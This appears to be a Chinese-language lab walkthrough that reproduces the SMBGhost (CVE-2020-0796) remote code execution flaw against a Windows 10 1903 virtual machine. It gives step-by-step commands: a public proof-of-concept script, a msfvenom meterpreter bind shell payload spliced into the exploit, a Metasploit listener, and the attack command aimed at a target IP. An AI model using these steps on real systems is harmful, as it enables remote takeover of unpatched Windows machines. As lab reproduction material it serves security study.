CVE-2020-0796(SMBGhost) RCE 复现
基本环境#
攻击机:Kali Linux最新版,192.168.85.131
Python版本:3.6!! 十分重要,Kali自带的3.9会蓝屏
被攻击机:Win10 v1903 (OS内部版本18362.356),192.168.85.145
1 | ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C4C401036B0B1EBA64476A95F338|/ |
Kali配置#
安装Python3.6
1 | wget -c https://www.python.org/ftp/python/3.6.0/Python-3.6.0.tgz |
安装后使用python3.6
和pip3.6
执行脚本和安装包
Windows配置#
启动SMB服务
控制面板-> 程序 -> 启动或关闭Windows功能 -> SMB 1.0/CIFS 文件共享支持 -> 重启计算机
关闭防火墙
控制面板-> 系统和安全 -> Windows Defender 防火墙 -> 启动或关闭 Windows Defender防火墙 ->关闭专用网络和共用网络的防火墙
攻击流程#
- 下载攻击脚本 https://github.com/chompie1337/SMBGhost_RCE_PoC
- 生成shellcode
1 | msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python -o shellcode.py |
- 修改exploit.py,在
USER_PAYLOAD
构造的最后加入
1 | from shellcode import buf |
- msf监听端口
1 | use exploit/multi/handler |
- 脚本攻击
1 | python3.6 exploit.py -ip 192.168.85.145 |